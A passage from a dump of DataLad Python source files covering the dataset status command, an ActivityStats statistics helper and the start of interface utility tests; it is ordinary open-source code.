It will be removed in a future release.\n cache : dict\n Cache to be passed on to all Repo.diffstatus() calls to avoid duplicate\n queries.\n reporting_order : {'depth-first', 'breadth-first'}, optional\n By default, subdataset content records are reported after the record\n on the subdataset's submodule in a superdataset (depth-first).\n Alternatively, report all superdataset records first, before reporting\n any subdataset content records (breadth-first).\n\n Yields\n ------\n dict\n DataLad result records.\n \"\"\"\n if eval_filetype is not None:\n warnings.warn(\n \"yield_dataset_status(eval_filetype=) no longer supported, \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n\n if reporting_order not in ('depth-first', 'breadth-first'):\n raise ValueError('Unknown reporting order: {}'.format(reporting_order))\n\n if ds.pathobj in queried:\n # do not report on a single dataset twice\n return\n # take the dataset that went in first\n repo = ds.repo\n repo_path = repo.pathobj\n lgr.debug('Querying %s.diffstatus() for paths: %s', repo, paths)\n # recode paths with repo reference for low-level API\n paths = [repo_path / p.relative_to(ds.pathobj) for p in paths] if paths else None\n status = repo.diffstatus(\n fr='HEAD' if repo.get_hexsha() else None,\n to=None,\n paths=paths,\n untracked=untracked,\n eval_submodule_state=eval_submodule_state,\n _cache=cache)\n if annexinfo and hasattr(repo, 'get_content_annexinfo'):\n if paths:\n # when an annex query has been requested for specific paths,\n # exclude untracked files from the annex query (else gh-7032)\n untracked = [k for k, v in status.items() if\n v['state'] == 'untracked']\n lgr.debug(\n 'Skipping %s.get_content_annexinfo() for untracked paths: %s',\n repo, paths)\n [paths.remove(p) for p in untracked]\n lgr.debug('Querying %s.get_content_annexinfo() for paths: %s', repo, paths)\n # this will amend `status`\n repo.get_content_annexinfo(\n paths=paths,\n init=status,\n eval_availability=annexinfo in ('availability', 'all'),\n ref=None)\n # potentially collect subdataset status call specs for the end\n # (if order == 'breadth-first')\n subds_statuscalls = []\n for path, props in status.items():\n cpath = ds.pathobj / path.relative_to(repo_path)\n yield dict(\n props,\n path=str(cpath),\n # report the dataset path rather than the repo path to avoid\n # realpath/symlink issues\n parentds=ds.path,\n )\n queried.add(ds.pathobj)\n if recursion_limit and props.get('type', None) == 'dataset':\n if cpath == ds.pathobj:\n # ATM can happen if there is something wrong with this repository\n # We will just skip it here and rely on some other exception to bubble up\n # See https://github.com/datalad/datalad/pull/4526 for the usecase\n lgr.debug(\"Got status for itself, which should not happen, skipping %s\", path)\n continue\n subds = Dataset(str(cpath))\n if subds.is_installed():\n call_args = (\n subds,\n None,\n annexinfo,\n untracked,\n recursion_limit - 1,\n queried,\n eval_submodule_state,\n None,\n cache,\n )\n call_kwargs = dict(\n reporting_order='depth-first',\n )\n if reporting_order == 'depth-first':\n yield from yield_dataset_status(*call_args, **call_kwargs)\n else:\n subds_statuscalls.append((call_args, call_kwargs))\n\n # deal with staged subdataset status calls\n for call_args, call_kwargs in subds_statuscalls:\n yield from yield_dataset_status(*call_args, **call_kwargs)\n\n\n@build_doc\nclass Status(Interface):\n \"\"\"Report on the state of dataset content.\n\n This is an analog to `git status` that is 
simultaneously crippled and more\n powerful. It is crippled, because it only supports a fraction of the\n functionality of its counter part and only distinguishes a subset of the\n states that Git knows about. But it is also more powerful as it can handle\n status reports for a whole hierarchy of datasets, with the ability to\n report on a subset of the content (selection of paths) across any number\n of datasets in the hierarchy.\n\n *Path conventions*\n\n All reports are guaranteed to use absolute paths that are underneath the\n given or detected reference dataset, regardless of whether query paths are\n given as absolute or relative paths (with respect to the working directory,\n or to the reference dataset, when such a dataset is given explicitly).\n Moreover, so-called \"explicit relative paths\" (i.e. paths that start with\n '.' or '..') are also supported, and are interpreted as relative paths with\n respect to the current working directory regardless of whether a reference\n dataset with specified.\n\n When it is necessary to address a subdataset record in a superdataset\n without causing a status query for the state _within_ the subdataset\n itself, this can be achieved by explicitly providing a reference dataset\n and the path to the root of the subdataset like so::\n\n datalad status --dataset . subdspath\n\n In contrast, when the state of the subdataset within the superdataset is\n not relevant, a status query for the content of the subdataset can be\n obtained by adding a trailing path separator to the query path (rsync-like\n syntax)::\n\n datalad status --dataset . subdspath/\n\n When both aspects are relevant (the state of the subdataset content\n and the state of the subdataset within the superdataset), both queries\n can be combined::\n\n datalad status --dataset . subdspath subdspath/\n\n When performing a recursive status query, both status aspects of subdataset\n are always included in the report.\n\n\n *Content types*\n\n The following content types are distinguished:\n\n - 'dataset' -- any top-level dataset, or any subdataset that is properly\n registered in superdataset\n - 'directory' -- any directory that does not qualify for type 'dataset'\n - 'file' -- any file, or any symlink that is placeholder to an annexed\n file when annex-status reporting is enabled\n - 'symlink' -- any symlink that is not used as a placeholder for an annexed\n file\n\n *Content states*\n\n The following content states are distinguished:\n\n - 'clean'\n - 'added'\n - 'modified'\n - 'deleted'\n - 'untracked'\n \"\"\"\n # make the custom renderer the default one, as the global default renderer\n # does not yield meaningful output for this command\n result_renderer = 'tailored'\n _examples_ = [\n dict(text=\"Report on the state of a dataset\",\n code_py=\"status()\",\n code_cmd=\"datalad status\"),\n dict(text=\"Report on the state of a dataset and all subdatasets\",\n code_py=\"status(recursive=True)\",\n code_cmd=\"datalad status -r\"),\n dict(text=\"Address a subdataset record in a superdataset without \"\n \"causing a status query for the state _within_ the subdataset \"\n \"itself\",\n code_py=\"status(dataset='.', path='mysubdataset')\",\n code_cmd=\"datalad status -d . mysubdataset\"),\n dict(text=\"Get a status query for the state within the subdataset \"\n \"without causing a status query for the superdataset (using trailing \"\n \"path separator in the query path):\",\n code_py=\"status(dataset='.', path='mysubdataset/')\",\n code_cmd=\"datalad status -d . 
mysubdataset/\"),\n dict(text=\"Report on the state of a subdataset in a superdataset and \"\n \"on the state within the subdataset\",\n code_py=\"status(dataset='.', path=['mysubdataset', 'mysubdataset/'])\",\n code_cmd=\"datalad status -d . mysubdataset mysubdataset/\"),\n dict(text=\"Report the file size of annexed content in a dataset\",\n code_py=\"status(annex=True)\",\n code_cmd=\"datalad status --annex\")\n ]\n\n _params_ = dict(\n _common_diffstatus_params,\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"path to be evaluated\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n eval_subdataset_state=Parameter(\n args=(\"-e\", \"--eval-subdataset-state\",),\n constraints=EnsureChoice('no', 'commit', 'full'),\n doc=\"\"\"Evaluation of subdataset state (clean vs.\n modified) can be expensive for deep dataset hierarchies\n as subdataset have to be tested recursively for\n uncommitted modifications. Setting this option to\n 'no' or 'commit' can substantially boost performance\n by limiting what is being tested. With 'no' no state\n is evaluated and subdataset result records typically do\n not contain a 'state' property.\n With 'commit' only a discrepancy of the HEAD commit\n shasum of a subdataset and the shasum recorded in the\n superdataset's record is evaluated,\n and the 'state' result property only reflects this\n aspect. With 'full' any other modification is considered\n too (see the 'untracked' option for further tailoring\n modification testing).\"\"\"),\n report_filetype=Parameter(\n args=(\"-t\", \"--report-filetype\",),\n constraints=EnsureChoice('raw', 'eval', None),\n doc=\"\"\"THIS OPTION IS IGNORED. It will be removed in a future\n release. Dataset component types are always reported\n as-is (previous 'raw' mode), unless annex-reporting is enabled\n with the [CMD: --annex CMD][PY: `annex` PY] option, in which\n case symlinks that represent annexed files will be reported\n as type='file'.\"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='status')\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n annex=None,\n untracked='normal',\n recursive=False,\n recursion_limit=None,\n eval_subdataset_state='full',\n report_filetype=None):\n if report_filetype is not None:\n warnings.warn(\n \"status(report_filetype=) no longer supported, and will be removed \"\n \"in a future release\",\n DeprecationWarning)\n\n # To the next white knight that comes in to re-implement `status` as a\n # special case of `diff`. There is one fundamental difference between\n # the two commands: `status` can always use the worktree as evident on\n # disk as a constraint (e.g. to figure out which subdataset a path is\n # in) `diff` cannot do that (everything need to be handled based on a\n # \"virtual\" representation of a dataset hierarchy).\n # MIH concludes that while `status` can be implemented as a special case\n # of `diff` doing so would complicate and slow down both `diff` and\n # `status`. So while the apparent almost code-duplication between the\n # two commands feels wrong, the benefit is speed. 
Any future RF should\n # come with evidence that speed does not suffer, and complexity stays\n # on a manageable level\n ds = require_dataset(\n dataset, check_installed=True, purpose='report status')\n ds_path = ds.path\n queried = set()\n content_info_cache = {}\n for res in _yield_paths_by_ds(ds, dataset, ensure_list(path)):\n if 'status' in res:\n # this is an error\n yield res\n continue\n for r in yield_dataset_status(\n res['ds'],\n res['paths'],\n annex,\n untracked,\n recursion_limit\n if recursion_limit is not None else -1\n if recursive else 0,\n queried,\n eval_subdataset_state,\n None,\n content_info_cache,\n reporting_order='depth-first'):\n if 'status' not in r:\n r['status'] = 'ok'\n yield dict(\n r,\n refds=ds_path,\n action='status',\n )\n\n @staticmethod\n def custom_result_renderer(res, **kwargs): # pragma: more cover\n if (res['status'] == 'ok' and res['action'] in ('status', 'diff')\n and res.get('state') == 'clean'):\n # this renderer will be silent for clean status|diff results\n return\n if res['status'] != 'ok' or res['action'] not in ('status', 'diff'):\n # whatever this renderer cannot account for, send to generic\n generic_result_renderer(res)\n return\n from datalad.ui import ui\n # when to render relative paths:\n # 1) if a dataset arg was given\n # 2) if CWD is the refds\n refds = res.get('refds', None)\n refds = refds if kwargs.get('dataset', None) is not None \\\n or refds == os.getcwd() else None\n path = res['path'] if refds is None \\\n else str(ut.Path(res['path']).relative_to(refds))\n type_ = res.get('type', res.get('type_src', ''))\n max_len = len('untracked')\n state = res.get('state', 'unknown')\n ui.message(u'{fill}{state}: {path}{type_}'.format(\n fill=' ' * max(0, max_len - len(state)),\n state=ac.color_word(\n state,\n STATE_COLOR_MAP.get(res.get('state', 'unknown'))),\n path=path,\n type_=' ({})'.format(\n ac.color_word(type_, ac.MAGENTA) if type_ else '')))\n\n @staticmethod\n def custom_result_summary_renderer(results): # pragma: more cover\n # fish out sizes of annexed files. those will only be present\n # with --annex ...\n annexed = [\n (r.get('bytesize', None), r.get('has_content', None), r['path'])\n for r in results\n if r.get('action', None) == 'status' \\\n and 'key' in r]\n if annexed:\n # convert to int and interrogate files with content but\n # with unknown size (e.g. 
for --relaxed URLs), and drop 'path'\n annexed = [\n (int(bytesize) if bytesize is not None else (\n int(os.stat(path).st_size) if has_content else 0\n ), has_content)\n for bytesize, has_content, path in annexed\n ]\n have_availability = any(a[1] is not None for a in annexed)\n total_size = bytes2human(sum(a[0] for a in annexed))\n # we have availability info encoded in the results\n from datalad.ui import ui\n if have_availability:\n ui.message(\n \"{} annex'd {} ({}/{} present/total size)\".format(\n len(annexed),\n single_or_plural('file', 'files', len(annexed)),\n bytes2human(sum(a[0] for a in annexed if a[1])),\n total_size))\n else:\n ui.message(\n \"{} annex'd {} ({} recorded total size)\".format(\n len(annexed),\n single_or_plural('file', 'files', len(annexed)),\n total_size))\n if all(r.get('action', None) == 'status'\n and r.get('state', None) == 'clean'\n for r in results):\n from datalad.ui import ui\n ui.message(\"nothing to save, working tree clean\")\n\n\ndef get_paths_by_ds(refds, dataset_arg, paths, subdsroot_mode='rsync'):\n \"\"\"Resolve and sort any paths into their containing datasets\n\n Any path will be associated (sorted into) its nearest containing dataset.\n It is irrelevant whether or not a path presently exists on the file system.\n However, only datasets that exist on the file system are used for\n sorting/association -- known, but non-existent subdatasets are not\n considered.\n\n Parameters\n ----------\n refds: Dataset\n dataset_arg: Dataset or str or Path or None\n Any supported value given to a command's `dataset` argument. Given\n to `resolve_path()`.\n paths: list\n Any number of absolute or relative paths, in str-form or as\n Path instances, to be sorted into their respective datasets. See also\n the `subdsroot_mode` parameter.\n subdsroot_mode: {'rsync', 'super', 'sub'}\n Switch behavior for paths that are the root of a subdataset. By default\n ('rsync'), such a path is associated with its parent/superdataset,\n unless the path ends with a trailing directory separator, in which case\n it is sorted into the subdataset record (this resembles the path\n semantics of rsync, hence the label). In 'super' mode, the path is always\n placed with the superdataset record. Likewise, in 'sub' mode the path\n is always placed into the subdataset record.\n\n Returns\n -------\n dict, list\n The first return value is the main result, a dictionary with root\n directories of all discovered datasets as keys and a list of the\n associated paths inside these datasets as values. 
Keys and values are\n normalized to be Path instances of absolute paths.\n The second return value is a list of all paths (again Path instances)\n that are not located underneath the reference dataset.\n \"\"\"\n ds_path = refds.path\n paths_by_ds = dict()\n errors = []\n\n if not paths:\n # that was quick\n paths_by_ds[refds.pathobj] = None\n return paths_by_ds, errors\n\n # in order to guarantee proper path sorting, we first need to resolve all\n # of them (some may be str, some Path, some relative, some absolute)\n # step 1: normalize to unicode\n paths = map(ensure_unicode, paths)\n # step 2: resolve\n # for later comparison, we need to preserve the original value too\n paths = [(resolve_path(p, dataset_arg), str(p)) for p in paths]\n # OPT: store cache for dataset roots for each directory directly\n # listed in paths, or containing the path (if file)\n roots_cache = {}\n # sort any path argument into the respective subdatasets\n # sort by comparing the resolved Path instances, this puts top-level\n # paths first, leading to their datasets to be injected into the result\n # dict first\n for p, orig_path in sorted(paths, key=lambda x: x[0]):\n # TODO (left from implementing caching OPT):\n # Logic here sounds duplicated with discover_dataset_trace_to_targets\n # and even get_tree_roots of save.\n str_p = str(p)\n\n # query get_dataset_root caching for repeated queries within the same\n # directory\n if p.is_dir():\n p_dir = str(p)\n else: # symlink, file, whatnot - seems to match logic in get_dataset_root\n p_dir = str(p.parent)\n\n try:\n root = roots_cache[p_dir]\n except KeyError:\n root = roots_cache[p_dir] = get_dataset_root(p_dir)\n\n # to become the root of the dataset that contains the path in question\n # in the context of (same basepath) as the reference dataset\n qds_inrefds = None\n if root is not None:\n qds_inrefds = path_under_rev_dataset(refds, root)\n if root is None or qds_inrefds is None:\n # no root, not possibly underneath the refds\n # or root that is not underneath/equal the reference dataset root\n errors.append(p)\n continue\n\n if root != qds_inrefds:\n # try to recode the dataset path wrt to the reference\n # dataset\n # the path that it might have been located by could\n # have been a resolved path or another funky thing\n # the path this dataset was located by is not how it would\n # be referenced underneath the refds (possibly resolved\n # realpath) -> recode all paths to be underneath the refds\n p = qds_inrefds / p.relative_to(root)\n root = qds_inrefds\n\n # Note: Compare to Dataset(root).path rather\n # than root to get same path normalization.\n if root == str_p and not Dataset(root).path == ds_path and (\n subdsroot_mode == 'super' or (\n subdsroot_mode == 'rsync' and dataset_arg and\n not orig_path.endswith(op.sep))):\n # the given path is pointing to a subdataset\n # and we are either in 'super' mode, or in 'rsync' and found\n # rsync-link syntax to identify the dataset as whole\n # (e.g. 'ds') vs its content (e.g. 
'ds/')\n root_dir = op.dirname(root)\n try:\n super_root = roots_cache[root_dir]\n except KeyError:\n super_root = roots_cache[root_dir] = get_dataset_root(root_dir)\n if super_root:\n # the dataset identified by the path argument\n # is contained in a superdataset, and no\n # trailing path separator was found in the\n # argument -> user wants to address the dataset\n # as a whole (in the superdataset)\n root = super_root\n\n root = ut.Path(root)\n ps = paths_by_ds.get(root, [])\n ps.append(p)\n paths_by_ds[root] = ps\n return paths_by_ds, errors\n\n\ndef _yield_paths_by_ds(refds, dataset_arg, paths):\n \"\"\"Status-internal helper to yield get_paths_by_ds() items\"\"\"\n paths_by_ds, errors = get_paths_by_ds(refds, dataset_arg, paths)\n # communicate all the problems\n for e in errors:\n yield dict(\n path=str(e),\n action='status',\n refds=refds.path,\n status='error',\n message=('path not underneath the reference dataset %s',\n refds.path),\n logger=lgr)\n\n while paths_by_ds:\n # gh-6566 advised replacement of OrderedDicts with dicts for performance\n # The previous qdspath, qpaths = paths_by_ds.popitem(last=False) used an\n # OrderedDict specific function (returns k, v in FIFO order). Below is a\n # less pretty replacement for this functionality with a pure dict\n qdspath = next(iter(paths_by_ds.keys()))\n qpaths = paths_by_ds.pop(qdspath)\n if qpaths and qdspath in qpaths:\n # this is supposed to be a full status query, save some\n # cycles sifting through the actual path arguments\n qpaths = []\n yield dict(ds=Dataset(qdspath), paths=qpaths)\n" }, { "alpha_fraction": 0.5117970108985901, "alphanum_fraction": 0.5134130716323853, "avg_line_length": 31.22916603088379, "blob_id": "c950e4e4b2c0ec5163b163cb323e7c26a29f03ec", "content_id": "3b572876523a1166adcaf7592aaa9e3fc5155caa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6188, "license_type": "permissive", "max_line_length": 99, "num_lines": 192, "path": "/datalad/support/stats.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"A helper for collecting stats on carried out actions\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# TODO: we have already smth in progressbar... check\nimport humanize\n\n_COUNTS = (\n 'files', 'urls',\n 'add_git', 'add_annex', 'dropped',\n 'skipped', 'overwritten', 'renamed', 'removed',\n 'downloaded', 'downloaded_size', 'downloaded_time',\n 'datasets_crawled',\n 'datasets_crawl_failed',\n)\n\n_LISTS = (\n 'merges', # merges which were carried out (from -> to)\n 'versions', # versions encountered. 
Latest would be used for tagging\n)\n\n_FORMATTERS = {\n # TODO:\n 'downloaded_size': humanize.naturalsize,\n 'merges': lambda merges: \", \".join('->'.join(merge) for merge in merges),\n 'versions': lambda versions: ', '.join(versions)\n}\n\n\n# @auto_repr\nclass ActivityStats(object):\n \"\"\"Helper to collect/pass statistics on carried out actions\n\n It also keeps track of total counts, which do not get reset by\n reset() call, and \"total\" stat could be obtained by .get_total()\n Could be done so many other ways\n \"\"\"\n __metrics__ = _COUNTS + _LISTS\n __slots__ = __metrics__ + ('_current', '_total')\n\n def __init__(self, **vals):\n self._current = {}\n self._total = {}\n self.reset(full=True, vals=vals)\n\n def __repr__(self):\n # since auto_repr doesn't support \"non-0\" values atm\n return \"%s(%s)\" \\\n % (self.__class__.__name__,\n \", \".join([\"%s=%s\" % (k, v) for k, v in self._current.items() if v]))\n\n # Comparisons operate solely on _current\n def __eq__(self, other):\n return (self._current == other._current) # and (self._total == other._total)\n\n def __ne__(self, other):\n return (self._current != other._current) # or (self._total != other._total)\n\n def __iadd__(self, other):\n for m in other.__metrics__:\n # not inplace for increased paranoia for bloody lists, and dummy implementation of *add\n self._current[m] = self._current[m] + other._current[m]\n self._total[m] = self._total[m] + other._total[m]\n return self\n\n def __add__(self, other):\n # crashed\n # out = deepcopy(self)\n # so doing ugly way\n out = ActivityStats(**self._current)\n out._total = self._total.copy()\n out += other\n return out\n\n def __setattr__(self, key, value):\n if key in self.__metrics__:\n self._current[key] = value\n else:\n return super(ActivityStats, self).__setattr__(key, value)\n\n def __getattribute__(self, key):\n if (not key.startswith('_')) and key in self.__metrics__:\n return self._current[key]\n else:\n return super(ActivityStats, self).__getattribute__(key)\n\n def _get_updated_total(self):\n \"\"\"Return _total updated with _current\n \"\"\"\n out = self._total.copy()\n for k, v in self._current.items():\n # not inplace + so we could create copies of lists\n out[k] = out[k] + v\n return out\n\n def increment(self, k, v=1):\n \"\"\"Helper for incrementing counters\"\"\"\n self._current[k] += v\n\n def _reset_values(self, d, vals):\n for c in _COUNTS:\n d[c] = vals.get(c, 0)\n for l in _LISTS:\n d[l] = vals.get(l, [])\n\n def reset(self, full=False, vals=None):\n # Initialize\n if vals is None:\n vals = {}\n if not full:\n self._total = self._get_updated_total()\n self._reset_values(self._current, vals=vals)\n if full:\n self._reset_values(self._total, vals=vals)\n\n def get_total(self):\n \"\"\"Return a copy of total stats (for convenience)\"\"\"\n return self.__class__(**self._get_updated_total())\n\n def as_dict(self):\n return self._current.copy()\n\n def as_str(self, mode='full'):\n \"\"\"\n\n Parameters\n ----------\n mode : {'full', 'line'}\n \"\"\"\n\n # Example\n #\"\"\"\n #URLs processed: {urls}\n # downloaded: {downloaded}\n # downloaded size: {downloaded_size}\n #Files processed: {files}\n # skipped: {skipped}\n # renamed: {renamed}\n # removed: {removed}\n # added to git: {add_git}\n # added to annex: {add_annex}\n # overwritten: {overwritten}\n #Branches merged:\n # upstream -> master\n #\"\"\"\n\n # TODO: improve\n entries = self.as_dict()\n entries.update({\n k: (_FORMATTERS[k](entries[k]) if entries[k] else '')\n for k in _FORMATTERS\n })\n\n 
out_formats = [\n (\"URLs processed\", \"urls\"),\n (\" downloaded\", \"downloaded\"),\n (\" size\", \"downloaded_size\"),\n (\"Files processed\", \"files\"),\n (\" skipped\", \"skipped\"),\n (\" renamed\", \"renamed\"),\n (\" removed\", \"removed\"),\n (\" overwritten\", \"overwritten\"),\n (\" +git\", \"add_git\"),\n (\" +annex\", \"add_annex\"),\n (\"Branches merged\", \"merges\"),\n (\"Datasets crawled\", \"datasets_crawled\"),\n (\" failed\", \"datasets_crawl_failed\"),\n ]\n # Filter out empty/0 ones\n out = [\"%s: \" % s + str(entries[m]) for s, m in out_formats if entries[m]]\n if mode == 'full':\n return '\\n'.join(out)\n elif mode == 'line':\n for i, o in enumerate(out):\n if o[0] != ' ':\n out[i] = ' ' + o\n return ','.join(out).lstrip()\n #return \"{files} files (git/annex: {add_git}/{add_annex}), \" \\\n # \"{skipped} skipped, {renamed} renamed, {overwritten} overwritten\".format(\n # **entries)\n else:\n raise ValueError(\"Unknown mode %s\" % mode)\n" }, { "alpha_fraction": 0.5712394714355469, "alphanum_fraction": 0.5770934224128723, "avg_line_length": 32.98788833618164, "blob_id": "ed1fb658aabde1fe5b2fd9775c150542c2ff78af", "content_id": "54f5e478b67b34523d2b1eec48708a38c51ffae7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19645, "license_type": "permissive", "max_line_length": 87, "num_lines": 578, "path": "/datalad/interface/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test interface.utils\n\n\"\"\"\n\nimport logging\nimport re\nfrom contextlib import contextmanager\nfrom os.path import exists\nfrom os.path import join as opj\nfrom time import sleep\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n)\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.support.constraints import (\n EnsureKeyChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.tests.utils_pytest import (\n assert_dict_equal,\n assert_equal,\n assert_in,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_re_in,\n assert_repo_status,\n assert_result_count,\n assert_true,\n ok_,\n slow,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n swallow_logs,\n swallow_outputs,\n)\n\nfrom ..base import Interface\nfrom ..results import get_status_dict\nfrom ..utils import (\n discover_dataset_trace_to_targets,\n handle_dirty_dataset,\n)\n\n__docformat__ = 'restructuredtext'\nlgr = logging.getLogger('datalad.interface.tests.test_utils')\n_dirty_modes = ('fail', 'ignore', 'save-before')\n\n\ndef _check_all_clean(ds, state):\n assert state is not None\n for mode in _dirty_modes:\n # nothing wrong, nothing saved\n handle_dirty_dataset(ds, mode)\n assert_equal(state, ds.repo.get_hexsha())\n\n\ndef _check_auto_save(ds, orig_state):\n handle_dirty_dataset(ds, 'ignore')\n assert_raises(RuntimeError, handle_dirty_dataset, ds, 'fail')\n handle_dirty_dataset(ds, 'save-before')\n state = ds.repo.get_hexsha()\n assert_not_equal(orig_state, state)\n _check_all_clean(ds, 
state)\n return state\n\n\n@with_tempfile(mkdir=True)\ndef test_dirty(path=None):\n for mode in _dirty_modes:\n # does nothing without a dataset\n handle_dirty_dataset(None, mode)\n # placeholder, but not yet created\n ds = Dataset(path)\n # unknown mode\n assert_raises(ValueError, handle_dirty_dataset, ds, 'MADEUP')\n # not yet created is very dirty\n assert_raises(RuntimeError, handle_dirty_dataset, ds, 'fail')\n handle_dirty_dataset(ds, 'ignore')\n assert_raises(RuntimeError, handle_dirty_dataset, ds, 'save-before')\n # should yield a clean repo\n ds.create()\n orig_state = ds.repo.get_hexsha()\n _check_all_clean(ds, orig_state)\n # tainted: untracked\n with open(opj(ds.path, 'something'), 'w') as f:\n f.write('some')\n # we don't want to auto-add untracked files by saving (anymore)\n assert_raises(AssertionError, _check_auto_save, ds, orig_state)\n # tainted: staged\n ds.repo.add('something', git=True)\n orig_state = _check_auto_save(ds, orig_state)\n # tainted: submodule\n # not added to super on purpose!\n subds = ds.create('subds')\n _check_all_clean(subds, subds.repo.get_hexsha())\n assert_repo_status(ds.path)\n # subdataset must be added as a submodule!\n assert_equal(ds.subdatasets(result_xfm='relpaths'), ['subds'])\n\n\ndemo_hierarchy = {\n 'a': {\n 'aa': {\n 'file_aa': 'file_aa'}},\n 'b': {\n 'ba': {\n 'file_ba': 'file_ba'},\n 'bb': {\n 'bba': {\n 'bbaa': {\n 'file_bbaa': 'file_bbaa'}},\n 'file_bb': 'file_bb'}},\n 'c': {\n 'ca': {\n 'file_ca': 'file_ca'},\n 'file_c': 'file_c'},\n 'd': {\n 'da': {\n 'file_da': 'file_da'},\n 'db': {\n 'file_db': 'file_db'},\n 'file_d': 'file_d'},\n}\n\n\ndef make_demo_hierarchy_datasets(path, tree, parent=None):\n if parent is None:\n parent = Dataset(path).create(force=True)\n for node, items in tree.items():\n if isinstance(items, dict):\n node_path = opj(path, node)\n nodeds = parent.create(node_path, force=True)\n make_demo_hierarchy_datasets(node_path, items, parent=nodeds)\n return parent\n\n\n@slow # 74.4509s\n@with_tree(demo_hierarchy)\ndef test_save_hierarchy(path=None):\n # this test doesn't use API`remove` to avoid circularities\n ds = make_demo_hierarchy_datasets(path, demo_hierarchy)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n ds_bb = Dataset(opj(ds.path, 'b', 'bb'))\n ds_bba = Dataset(opj(ds_bb.path, 'bba'))\n ds_bbaa = Dataset(opj(ds_bba.path, 'bbaa'))\n # introduce a change at the lowest level\n ds_bbaa.repo.remove('file_bbaa')\n for d in (ds, ds_bb, ds_bba, ds_bbaa):\n ok_(d.repo.dirty)\n # need to give file specifically, otherwise it will simply just preserve\n # staged changes\n ds_bb.save(path=opj(ds_bbaa.path, 'file_bbaa'))\n # it has saved all changes in the subtrees spanned\n # by the given datasets, but nothing else\n for d in (ds_bb, ds_bba, ds_bbaa):\n assert_repo_status(d.path)\n ok_(ds.repo.dirty)\n # now with two modified repos\n d = Dataset(opj(ds.path, 'd'))\n da = Dataset(opj(d.path, 'da'))\n da.repo.remove('file_da')\n db = Dataset(opj(d.path, 'db'))\n db.repo.remove('file_db')\n # generator\n d.save(recursive=True)\n for d in (d, da, db):\n assert_repo_status(d.path)\n ok_(ds.repo.dirty)\n # and now with files all over the place and saving\n # all the way to the root\n aa = Dataset(opj(ds.path, 'a', 'aa'))\n aa.repo.remove('file_aa')\n ba = Dataset(opj(ds.path, 'b', 'ba'))\n ba.repo.remove('file_ba')\n bb = Dataset(opj(ds.path, 'b', 'bb'))\n bb.repo.remove('file_bb')\n c = Dataset(opj(ds.path, 'c'))\n c.repo.remove('file_c')\n ca = Dataset(opj(ds.path, 'c', 'ca'))\n ca.repo.remove('file_ca')\n d = 
Dataset(opj(ds.path, 'd'))\n d.repo.remove('file_d')\n ds.save(\n # append trailing slashes to the path to indicate that we want to\n # have the staged content in the dataset saved, rather than only the\n # subdataset state in the respective superds.\n path=[opj(p, '')\n for p in (aa.path, ba.path, bb.path, c.path, ca.path, d.path)])\n\n\n# Note: class name needs to match module's name\n@build_doc\nclass TestUtils(Interface):\n \"\"\"TestUtil's fake command\"\"\"\n\n result_renderer = 'tailored' # overrides None default\n return_type = 'item-or-list' # overrides 'list'\n\n _params_ = dict(\n number=Parameter(\n args=(\"-n\", \"--number\",),\n doc=\"\"\"It's a number\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to update. If\n no dataset is given, an attempt is made to identify the dataset\n based on the input and/or the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n result_fn=Parameter(\n args=tuple(), # Hide this from the cmdline parser.\n doc=\"\"\"Generate the result records with this function\n rather than using the default logic. `number` will be\n passed as an argument.\"\"\"),)\n\n @staticmethod\n @datasetmethod(name='fake_command')\n @eval_results\n def __call__(number, dataset=None, result_fn=None):\n if result_fn:\n yield from result_fn(number)\n else:\n for i in range(number):\n # this dict will need to have the minimum info\n # required by eval_results\n yield {'path': 'some', 'status': 'ok', 'somekey': i,\n 'action': 'off'}\n\n\ndef test_eval_results_plus_build_doc():\n\n # test docs\n\n # docstring was build already:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n TestUtils().__call__(1)\n assert_not_in(\"Building doc for\", cml.out)\n # docstring accessible both ways:\n doc1 = Dataset.fake_command.__doc__\n doc2 = TestUtils().__call__.__doc__\n\n # docstring was built from Test_Util's definition:\n assert_equal(doc1, doc2)\n assert_in(\"TestUtil's fake command\", doc1)\n assert_in(\"Parameters\", doc1)\n assert_in(\"It's a number\", doc1)\n\n # docstring shows correct override values of defaults in eval_params\n assert_re_in(\"Default:\\\\s+'tailored'\", doc1, match=False)\n assert_re_in(\"Default:\\\\s+'item-or-list'\", doc1, match=False)\n\n # docstring also contains eval_result's parameters:\n assert_in(\"result_filter\", doc1)\n assert_in(\"return_type\", doc1)\n assert_in(\"list\", doc1)\n assert_in(\"None\", 